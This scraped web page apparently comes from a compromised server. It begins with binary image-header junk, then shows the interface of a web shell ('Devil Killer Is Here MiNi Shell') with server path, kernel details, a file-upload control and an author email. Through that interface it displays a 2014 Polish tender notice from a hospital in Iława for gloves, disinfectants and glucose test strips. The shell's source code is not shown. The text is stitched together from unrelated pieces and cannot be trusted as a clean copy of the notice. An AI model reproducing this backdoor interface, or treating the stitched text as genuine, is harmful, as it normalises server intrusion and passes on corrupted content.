JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140403/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140403/113578-N-2014.html

<p class="kh_header"><b>Iława: Dostawa rękawic diagnostycznych i chirurgicznych oraz środków do myjni i innych z podziałem na 5 zadań dla Powiatowego Szpitala im. Władysława Biegańskiego w Iławie 
(nr sprawy 16/2014)</b><br>
<b>Numer ogłoszenia: 113578 - 2014; data zamieszczenia: 03.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Szpital im. Władysława Biegańskiego w Iławie , ul. Gen. Wł. Andersa 3, 14-200 Iława, woj. warmińsko-mazurskie, tel. 89 6449601, faks 89 6492425.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> szpital.ilawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa rękawic diagnostycznych i chirurgicznych oraz środków do myjni i innych z podziałem na 5 zadań dla Powiatowego Szpitala im. Władysława Biegańskiego w Iławie 
(nr sprawy 16/2014).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa rękawic diagnostycznych i chirurgicznych oraz środków do myjni i innych z podziałem na 5 zadań dla Powiatowego Szpitala im. Władysława Biegańskiego w Iławie (nr sprawy 16/2014)

Zadanie nr 1 Środki dezynfekcyjne do myjki automatycznej EDT 3
Zadanie nr 2 Rękawice chirurgiczne i diagnostyczne
Zadanie nr 3 Paski do mierzenia stężenia glukozy we krwi wraz z wypożyczeniem glukometrów   
Zadanie nr 4  Środki do maszynowego mycia
Zadanie nr 5 Etykiety.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8, 33.14.14.20-0, 33.12.41.31-2, 33.63.16.00-8, 33.19.80.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">3.4.W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego - Zamawiający żąda dostarczenia:
3.4.1 dla Zadania nr 2 Rękawice chirurgiczne i diagnostyczne 
1)Zamawiający żąda przedłożenia próbek w postaci jednej najmniejszej jednostki handlowej dla wszystkich pozycji, 
2)dołączenia do oferty raportów z badań producenta nie starszych niż z 2013 r.  (dla wszystkich pozycji oprócz poz. 8).</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony formularz ofertowy 2. Wypełniony formularz specyfikacji przedmiotowej (formularz cenowy) 3.Zaakceptowany projekt umowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>17.1 Strony dopuszczają zmiany treści umowy czasowe lub trwałe w trakcie jej obowiązywania, w przypadku: 1. zmiana dotyczy nieistotnych postanowień zawartej umowy, 2. podczas realizacji umowy wystąpią nieprzewidywalne zdarzenia lub okoliczności, jak w szczególności klęski żywiołowe, strajki, zamieszki, konflikty zbrojne, które uniemożliwiają zrealizowanie przedmiotu zamówienia w sposób, w zakresie i w terminie przewidzianym w ofercie. 3. w wyniku istotnej zmiany stosunków spełnianie świadczenia byłoby połączone z nadmiernymi trudnościami lub groziłoby, co najmniej jednej ze stron znaczną stratą, a czego strony nie mogły przewidzieć przy zawarciu umowy - w przypadku istotnej zmiany stosunków takiej jak znaczny wzrost cen surowców, nośników energii itp. 4.zmiana dotyczy obniżenia cen jednostkowych poszczególnych elementów przedmiotu zamówienia - w przypadku promocji, ogólnej obniżki cen na dany asortyment itp. 5.dotyczy zmian koniecznych ze względu na zmianę powszechnie obowiązujących przepisów prawa, w szczególności stawek podatku VAT, stawek celnych - w przypadku zaistnienia takich zmian. 6.konieczność wprowadzenia zmiany wynika z okoliczności, których nie można było przewidzieć w ogłoszeniu o zamówieniu lub specyfikacji istotnych warunków zamówienia. 17.2. Wprowadzenie zmian określonych w ust. 2 wymaga uzasadnienia konieczności zmiany i porozumienia stron oraz sporządzenia aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.ilawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Szpital im. Władysława Biegańskiego w Iławie ul. Gen. Wł. Andersa 3 14-200 Iława Pokój nr 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.04.2014 godzina 10:00, miejsce: Powiatowy Szpital im. Władysława Biegańskiego w Iławie ul. Gen. Wł. Andersa 3 14-200 Iława Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Środki dezynfekcyjne do myjki automatycznej EDT 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	EndoDis 2,8l środek dezynfekujący lub równoważny	sztuka	60
2	EndoAct 5 l środek aktywujący lub równoważny	sztuka	35
3	EndoDet 5 l środek myjący lub równoważny	sztuka	24.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Rękawice chirurgiczne i diagnostyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Rękawice chirurgiczne, lateksowe, sterylne, pudrowe, zgodnie z normą EN 455-1.2.3,4.para	15000
2	Rękawice chirurgiczne lateksowe sterylne antyalergiczne (bezpudrowe) obustronnie polimeryzowane, para	1500
3	Rękawice nitrylowe, niejałowe bezpudrowe z rolowanym mankietem,  Rozmiary XS-XL. Opakowanie po 100 sztuk. Długość rękawicy min. 240 mm.	opak.	5000
4	Rękawice diagnostyczne z polichlorku winylu ze środkiem pudrującym mączką kukurydzianą  Opakowanie 100sztuk.	opak.	1000
5	Rękawice chirurgiczne, sterylne, lateksowe z przedłużonym mankietem, o długości 500mm, położniczo-ginekologiczne, bezpudrowe, 	para	100
6	Rękawice chirurgiczne, ortopedyczne , sterylne, bezpudrowe, lateksowe, pokryte polimerem, z rolowanym mankietem, o grubszych ściankach, para	1500
7	Rękawice nitrylowe, niesterylne, bezpudrowe  o przedłużonym mankiecie, teksturowane na palcach, opakowanie: a 100 szt.	opak.	300
8	Rękawice foliowe w rozmiarach: S, M, L, pakowane po 100 sztuk.	opak.	500
9	Rękawice diagnostyczne wykonane z nitrylu, bezpudrowe, z wewnętrzną warstwą polimerową, mankiet rolowany, w kolorze niebieskim. Opakowanie rozmiarów od XS do XL zawierające 100 szt. rękawic.	opak.	5500
10	Rękawice chirurgiczne Neopronowe, obustronnie polimeryzowane o anatomicznym kształcie, mankiet rolowany, mikroteksturowane, para	1000
11	Rękawice sekcyjne wykonane z naturalnej gumy leteksowej, nieflokowane, A Rozmiar: M, L, XL.	para	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Paski do mierzenia stężenia glukozy we krwi wraz z wypożyczeniem glukometrów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Wypożyczenie glukometru do wykonywania pomiaru stężenia glukozy we krwi na czas trwania umowy. Glukometr: prosta obsługa - automatyczne włączenie i wyłączenie aparatu, ostrzeżenie o przeterminowanym teście paskowym, pamięć 350 min.250 parametrów ,łącze podczerwieni do przesłania danych do komputera PC lub przewód USB, dokładny wynik w 5 maks 8 sekund, duże pole testowe lub kapilara zasysająca krew, mała próbka krwi, średnie wartości parametrów z 7, 14, 30 min. 14 dni. Trwałość baterii ok. 1000 pomiarów lub 1 rok, automatyczne wyłączanie po upływie ok. 30 sek. lub 90 sek. zależnie od wykonywanej operacji, zasilanie baterią typu CR 2032, objętość próbki 10, 6-2 mikrolitra glukometr kodowany lub niekodowany	sztuka	40
2	Paski testowe do glukometru z poz. 1 (opakowanie 50 sztuk)	opak.	750.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.31-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Środki do maszynowego mycia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Płynny, alkaliczny środek do mycia w myjniach dezynfekatorach, skutecznie usuwający pozostałości organiczne typu zaschnięta i denaturowana krew. Umożliwiający mycie maszynowe narzędzi i sprzętu medycznego także wykonanego z aluminium i tworzyw sztucznych. Niewymagający neutralizacji, umożliwiający zastosowanie w myjkach ultradziwiękowych, ph powyżej 10. Posiadający w swoim składzie: kwasy organiczne, alkalia (wodorotlenek potasu), enzymy, tenzydy, środki konserwujące, inhibitor korozji. Przystosowany do dozowania w Centralnym Systemie Dozowania. Opakowanie 20 l.	szt.	14
2	Płynny,alkaliczny środek do mycia oraz dezynfekcji w myjniach dezynfekatorach (w osobnych fazach mycia i dezynfekcji) sprzętu medycznego w tym czułego na temperaturę. Środek pozwalający na pracę w programach z neutralizacją środkiem kwaśnym lub bez neutralizacji. O działaniu bakteriobójczym, grzybobójczym, prątkobójczym, wirusobójczym. Nie zawierającym związków chlorowych orz innych związków utleniających. Wspomagający profilaktykę przeciw prionom w zakresie usuwania białek (RKI). Posiadający w swoim składzie: różne tenzydy, fosforany, inhibitor korozji. Przystosowany do dozowania w Centralnym Systemie Dozowania.Opakowanie 25 kg.	szt.	2
3	Płynny środek płuczący powierzchniowo czynny zawierający środki konserwujące do użycia w myjniach dezynfekatorach. Do szybkiego bezzaciekowego płukania znacznia przyśpieszający suszenie po maszynowym myciu i dezyfekcji. Przystosowany do dozowania w Centralnym Systemie Dozowania.Opakowanie 20 l.	szt.	10
4	Płynny, neutralizujący i myjący środek do stosowania w myjniach dezynfekatorach na bazie kwasu cytynowego. Nie posiadający w swoim składzie fosforanów, azotanów oraz tenydów.Przystosowany do dozowania w Centralnym Systemie Dozowania. Opakowanie 20 l.	szt.	10
5	Preparat do ręcznej pielęgnacji narzędzi chirurgicznych na węglowodorów alifatycznych nie wpływjący na proces sterylizacji parowej ( rozpuszczalny w wodzie) bezpieczny toksykologicznie. Opakowanie aerozol 0,4 l.	szt.	12
6	Płynny, słabo pieniący, neutralny środek dezynfekcyjny o działaniu bakteriobójczym, grzybobójczym, wirusobójczym i prątkobójczym na bazie aldehydu glutarowego i glioksalu: szczególnie dobrze dezynfekuje przedmioty z wrażliwych materiałów: nie zawiera aldehydu mrówkowego oraz czwarto-rzedowych zwiazków amoniowych. Opakowanie 20 l.	szt.	5
7	Środek do usuwania osadów ze sterylizatorów, płynny, kwaśny środek do odkamieniania zmywarek i kotłów elektrycznych. Skutecznie usuwający kamień kotłowy i inne osady. Zawierający w swoim składzie kwas fosforowy oraz niejonowe zwiazki powierzchniowo czynne. Do stosowania w stężeniu 1-5 %, a w przypadkach bardzo dużego zabrudzenia w postaci koncentratu. Opakowanie kanister 5l.	szt.	5
8	Środek do manualnej lub maszynowej dezynfekcji powierzchni posiadający szerokie spektrum działania (Tbc, HCV, HBV) posiadający w składzie chlorek bezalkoholowy nie zawierający aldehydów, kanister 6 l.	szt.	40
9	Testy mycia do myjni ultradźwiękowej przeznaczony do walidacji i rytnowej kontroli skuteczności procesów mycia w myjniach ultradźwiękowych. Zawierający syntetyczną substancję wskaźnikową zgodną z normą PN-EN ISO 15883-5 załącznik C- odpowiednik nigrozyny z mąką, jajkiem i skrobią ziemiaczaną, naniesioną na samoprzylepny nośnik z tworzywa sztucznego. Opakowanie 40 szt.	op.	2
10	Przyrząd testowy procesu służący do stymulacji narzędzi chirurgicznych w myjniach ultradźwiękowych, składający się ze stojaka o wysokości 20 cm ze stali nierdzewnej oraz regulowanego uchwytu z miejscem na umieszczenie dwóch testów skuteczności mycia jednocześnie.	szt.	1
11	Środek w sprayu do usuwania pozostałości kleju z etykiet i taśm samoprzylepnych. Opakowanie 300 ml.	op.	10
12	Preparat do ręcznego mycia i dezynfekcji narzędzi medycznych. Produkt przystosowany do manualnego mycia ręcznego jak również w myjni ultradźwiękowej. Produkt w formie powlekanego granulatu. Zawierający w swoim składzie min. nadwęglan sodu oraz kwas cytrynowy. Wykazujący działanie sporobójcze w stężeniu użytkowym 1% w czasie do 15 minut. Wykazujący pełne działanie ( bakterjobójcze, grzybobójcze, prątkobójcze, wirusobójcze włącznie z rotawirusami, norowirusami, sporobójcze włącznie z Clostridium difficile) w stężeniu użytkowym 2% w czasie 15 minut. Opakowanie 2 kg.	op.	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Etykiety.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Etykieta i klej odporne na temperaturę min. 1340 C, etykieta i klej odporne na próżnię min. -970 mBar-a, etykieta i klej odporne na ciśnienie min. 2,7 Barów, etykieta i klejk odporne na wilgoć, etykieta i klej odporne na gorącą parę wodną, typ snadwich: dwuwarstwowa, warstwa spodnia z klejem, który umożliwia naklejenia etykiety na rękaw papierowo-foliowy, włókninie, papier krepowy, itp.. Warstwa wierzchnia trójdzielna, po nadruku, nadruk odporny na ścieranie i rozmywanie, nawój 2000 szt etykiet/rolka	szt.	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.80.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com